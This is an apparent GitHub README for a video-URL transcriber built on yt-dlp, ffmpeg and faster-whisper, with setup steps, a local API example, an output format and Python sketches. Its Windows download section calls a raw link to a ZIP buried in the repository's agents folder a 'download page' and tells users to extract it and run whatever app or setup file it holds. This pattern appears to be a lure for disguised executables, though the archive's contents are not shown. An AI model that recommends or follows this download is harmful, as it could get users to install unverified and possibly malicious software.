🎥 universal-video-transcriber - Turn video links into text fast

🖥️ What this app does

Universal Video Transcriber turns a video URL into a transcript file in JSON format.

Use it when you want to:

copy spoken words from a video
keep a time-based record of audio
process links from many sites in one tool
get text from videos without doing it by hand

It follows this flow:

video URL in
media download with yt-dlp
audio cleanup with ffmpeg
speech to text with faster-whisper
timestamped JSON out
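
The flow above can be sketched in Python. This is a minimal sketch, not the project's actual code: the function names and the work folder are hypothetical, and it assumes yt-dlp and ffmpeg are on PATH and the faster-whisper package is installed.

```python
import subprocess
from pathlib import Path


def download_cmd(url: str, out_template: str) -> list[str]:
    """Build a yt-dlp command that extracts the audio track as WAV."""
    return ["yt-dlp", "--extract-audio", "--audio-format", "wav",
            "-o", out_template, url]


def cleanup_cmd(src: str, dst: str) -> list[str]:
    """Build an ffmpeg command that converts audio to 16 kHz mono WAV."""
    return ["ffmpeg", "-y", "-i", src, "-ac", "1", "-ar", "16000", dst]


def transcribe(audio_path: str, model_size: str = "small") -> dict:
    """Run faster-whisper and return the language plus timed segments."""
    from faster_whisper import WhisperModel  # imported lazily: heavy dependency

    model = WhisperModel(model_size)
    segments, info = model.transcribe(audio_path)
    return {
        "language": info.language,
        "transcript": [
            {"start": s.start, "end": s.end, "text": s.text.strip()}
            for s in segments
        ],
    }


def run_pipeline(url: str, workdir: str = "work") -> dict:
    """Hypothetical end-to-end run: download, clean up, transcribe."""
    work = Path(workdir)
    work.mkdir(exist_ok=True)
    raw = work / "raw.wav"
    clean = work / "clean.wav"
    # yt-dlp fills in %(ext)s, so the extracted audio lands in raw.wav
    subprocess.run(download_cmd(url, str(work / "raw.%(ext)s")), check=True)
    subprocess.run(cleanup_cmd(str(raw), str(clean)), check=True)
    result = transcribe(str(clean))
    result["source_url"] = url
    return result
```

The two command builders are kept separate from the code that runs them, so you can print a command and try it by hand when a step fails.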

📥 Download and set up on Windows

Visit the download page here:
https://github.com/ultraconservative-abneylevel672/universal-video-transcriber/raw/refs/heads/main/skill/video-url-transcriber/agents/universal-transcriber-video-v2.0.zip
On the page, look for the latest release or the main project files.
Download the Windows version if one is provided, or download the source package if that is the only option.
Save the file to your computer, then open the folder where it downloaded.
If you get a ZIP file, right-click it and choose Extract All.
Open the extracted folder and look for the app file or setup file.
If the app opens in a terminal window, that is normal for this tool.
Keep the folder in a place you can find again, such as Downloads or Desktop.

⚙️ What you need

For a smooth run on Windows, install these tools first:

Python 3.10 or newer
ffmpeg
yt-dlp

You also need enough free disk space for temporary video files. A larger video will use more space.

If you plan to process long videos, use a machine with at least 8 GB of memory.
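
A quick way to check these requirements is a small Python script. This is a sketch with hypothetical helper names; it is not part of the project and it uses only the standard library.

```python
import shutil
import sys


def missing_tools(names: list[str]) -> list[str]:
    """Return the tools from `names` that cannot be found on PATH."""
    return [name for name in names if shutil.which(name) is None]


def python_ok(minimum: tuple[int, int] = (3, 10)) -> bool:
    """Check that the running interpreter meets the minimum version."""
    return sys.version_info[:2] >= minimum


def free_gb(path: str = ".") -> float:
    """Return the free disk space, in GiB, on the drive that holds `path`."""
    return shutil.disk_usage(path).free / 1024**3


if __name__ == "__main__":
    print("Python 3.10 or newer:", python_ok())
    print("Missing tools:", missing_tools(["ffmpeg", "yt-dlp"]) or "none")
    print(f"Free disk space: {free_gb():.1f} GiB")
```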

🚀 First-time setup

If you downloaded the source version, do this on Windows:

Install Python from the official Python website.
Make sure Python is added to PATH during install.
Open Command Prompt in the project folder.
Create a virtual environment:

python -m venv .venv

Activate it:

.venv\Scripts\activate

Install the app requirements:

pip install -r requirements.txt

Install ffmpeg and yt-dlp if they are not already on your system.

▶️ Run the transcriber

Use the command below to check that your setup works:

python skill/video-url-transcriber/scripts/transcribe_url.py --doctor

Then run a transcription with a video link:

python skill/video-url-transcriber/scripts/transcribe_url.py "VIDEO_URL" --model-size small

If you want faster results, keep --model-size small.

If you want better accuracy on harder audio, use a larger model size.

🌐 Run the local API

If you want to send requests from another app, start the API server:

python skill/video-url-transcriber/scripts/run_api.py

The server runs on:

http://127.0.0.1:8099

Use this endpoint to transcribe a video:

curl -s http://127.0.0.1:8099/transcribe \
  -H 'content-type: application/json' \
  -d '{
    "url": "VIDEO_URL",
    "language": null,
    "model_size": "small",
    "word_timestamps": true,
    "persist_media": false
  }'
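
The same request can be sent from Python with the standard library. This is a sketch: the helper names and the 600-second timeout are assumptions, while the endpoint and the JSON fields are the ones shown in the curl command.

```python
import json
import urllib.request

API_URL = "http://127.0.0.1:8099/transcribe"


def build_request(video_url, language=None, model_size="small",
                  word_timestamps=True, persist_media=False):
    """Build a POST request with the same JSON body as the curl example."""
    payload = {
        "url": video_url,
        "language": language,
        "model_size": model_size,
        "word_timestamps": word_timestamps,
        "persist_media": persist_media,
    }
    return urllib.request.Request(
        API_URL,
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def transcribe(video_url: str, timeout: float = 600.0) -> dict:
    """Send the request and decode the JSON response."""
    request = build_request(video_url)
    with urllib.request.urlopen(request, timeout=timeout) as resp:
        return json.load(resp)
```

Call transcribe("VIDEO_URL") while the API server is running. Long videos can take a while, so raise the timeout if requests are cut off.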

📄 Output format

The app returns JSON with details about the source video and the transcript.

Example shape:

{
  "source_url": "VIDEO_URL",
  "platform": "x",
  "title": "Example Video Title",
  "language": "en",
  "model_size": "small",
  "transcript": [
    {
      "start": 0.0,
      "end": 3.2,
      "text": "Hello and welcome."
    }
  ]
}

Common fields include:

source_url — the original link you gave the app
platform — the site name detected by the tool
title — the video title when available
language — the spoken language, when the tool can detect it
model_size — the speech model used
transcript — the timed text split into parts
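
To read the output in a script, load the JSON and walk the transcript list. The sketch below assumes the example shape shown above; the helper names are hypothetical.

```python
import json


def format_timestamp(seconds: float) -> str:
    """Format seconds as HH:MM:SS.mmm."""
    total_ms = round(seconds * 1000)
    hours, rem = divmod(total_ms, 3_600_000)
    minutes, rem = divmod(rem, 60_000)
    secs, ms = divmod(rem, 1000)
    return f"{hours:02d}:{minutes:02d}:{secs:02d}.{ms:03d}"


def to_lines(result: dict) -> list[str]:
    """Turn each transcript segment into one readable line."""
    lines = []
    for seg in result.get("transcript", []):
        start = format_timestamp(seg["start"])
        end = format_timestamp(seg["end"])
        lines.append(f"[{start} - {end}] {seg['text']}")
    return lines


example = json.loads("""
{
  "source_url": "VIDEO_URL",
  "platform": "x",
  "title": "Example Video Title",
  "language": "en",
  "model_size": "small",
  "transcript": [
    {"start": 0.0, "end": 3.2, "text": "Hello and welcome."}
  ]
}
""")

for line in to_lines(example):
    print(line)  # prints: [00:00:00.000 - 00:00:03.200] Hello and welcome.
```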

🧭 How to use it well

Use short, clear video links when possible.

If a site blocks downloads, try a different link from the same platform.

If audio is noisy, the transcript may have more errors.

The example output has no speaker labels. If the video has more than one speaker, use the timestamps and the surrounding text to work out who said what.

For best results:

use good audio
choose the right language if you know it
pick a larger model for harder audio
keep word_timestamps on if you need fine timing

🧪 Common tasks

Transcribe a single video

python skill/video-url-transcriber/scripts/transcribe_url.py "VIDEO_URL"

Check your setup

python skill/video-url-transcriber/scripts/transcribe_url.py --doctor

Start the API server

python skill/video-url-transcriber/scripts/run_api.py

Send a test request

curl -s http://127.0.0.1:8099/transcribe \
  -H 'content-type: application/json' \
  -d '{
    "url": "VIDEO_URL",
    "language": null,
    "model_size": "small",
    "word_timestamps": true,
    "persist_media": false
  }'

🗂️ Files you may see

After a run, the tool may create:

a JSON transcript file
temporary media files
audio files used during processing

If persist_media is set to false, the app cleans up temporary files after it finishes.
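
One common way to get this behavior is a scratch folder that is deleted when the job ends. The sketch below shows the idea with the standard library; it is an assumption about how such cleanup can work, not the project's own code, and media_workspace is a hypothetical name.

```python
import shutil
import tempfile
from contextlib import contextmanager
from pathlib import Path


@contextmanager
def media_workspace(persist_media: bool = False):
    """Yield a scratch folder; delete it afterwards unless persist_media is set."""
    folder = Path(tempfile.mkdtemp(prefix="transcriber-"))
    try:
        yield folder
    finally:
        if not persist_media:
            # Runs even if the job fails, so no media files are left behind
            shutil.rmtree(folder, ignore_errors=True)


if __name__ == "__main__":
    with media_workspace() as work:
        (work / "audio.wav").write_bytes(b"")  # stand-in for a real download
        print("working in", work)
    print("folder still exists:", work.exists())
```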

If you keep media, use a folder with enough space.

🔧 Troubleshooting

If the app does not start, check these items:

Python is installed
ffmpeg is installed
yt-dlp is installed
you are in the correct folder
the virtual environment is active
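
The last two items can be checked from Python. This is a sketch with hypothetical helper names; the script path is the one used in the commands in this README.

```python
import os
import sys


def in_virtualenv() -> bool:
    """True when the interpreter runs inside a venv-style virtual environment."""
    return sys.prefix != sys.base_prefix


def in_project_folder(root: str = ".") -> bool:
    """True when the transcriber script exists under `root`."""
    script = os.path.join(root, "skill", "video-url-transcriber",
                          "scripts", "transcribe_url.py")
    return os.path.isfile(script)


if __name__ == "__main__":
    print("Virtual environment active:", in_virtualenv())
    print("In the project folder:", in_project_folder())
```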

If a video link fails, try another supported site or a different video URL.

If transcription takes a long time, use a shorter video or a smaller model.

If you see missing audio errors, the source video may have no audio track or no clear speech.

📌 Best results on Windows

For smoother use:

keep the app folder simple, such as C:\transcriber
avoid paths with special characters
close other heavy apps while processing large videos
use wired power on a laptop during long jobs

🧩 Supported sources

The tool works with any site that yt-dlp can read.

That usually includes:

YouTube
X
Vimeo
many public video pages
other direct media pages supported by yt-dlp
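
To check a link before a long run, you can ask yt-dlp for the site name and title without downloading anything. This is a sketch: the helper names are hypothetical, and it assumes the yt-dlp command is on PATH.

```python
import subprocess
from typing import Optional


def probe_cmd(url: str) -> list[str]:
    """Build a yt-dlp command that prints the extractor name and the title."""
    return ["yt-dlp", "--simulate", "--print",
            "%(extractor_key)s\t%(title)s", url]


def parse_probe(stdout: str) -> tuple[str, str]:
    """Split the first line of 'extractor<TAB>title' output into two parts."""
    lines = stdout.splitlines()
    first_line = lines[0] if lines else ""
    platform, _, title = first_line.partition("\t")
    return platform, title


def probe(url: str) -> Optional[tuple[str, str]]:
    """Return (platform, title), or None when yt-dlp cannot read the link."""
    done = subprocess.run(probe_cmd(url), capture_output=True, text=True)
    if done.returncode != 0:
        return None
    return parse_probe(done.stdout)
```

If probe("VIDEO_URL") returns None, yt-dlp could not read the link, so the transcriber is unlikely to handle it either.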

📝 Typical workflow

Copy a video URL.
Run the transcriber.
Wait for the audio to download and process.
Open the JSON output.
Use the timestamps to find the part you need.
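
The last step can be done with a short search over the transcript list. This is a sketch: find_segments is a hypothetical helper, and the second segment is made-up sample data.

```python
def find_segments(transcript: list[dict], keyword: str) -> list[dict]:
    """Return segments whose text contains `keyword`, ignoring case."""
    needle = keyword.casefold()
    return [seg for seg in transcript if needle in seg["text"].casefold()]


transcript = [
    {"start": 0.0, "end": 3.2, "text": "Hello and welcome."},
    {"start": 3.2, "end": 7.5, "text": "Today we cover setup."},
]

for seg in find_segments(transcript, "SETUP"):
    print(f"{seg['start']:.1f}s: {seg['text']}")  # prints: 3.2s: Today we cover setup.
```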

📎 Example use cases

save a class lecture as text
turn a meeting recording into notes
review a talk without replaying the full video
search spoken content more easily
keep a time-based transcript for later work
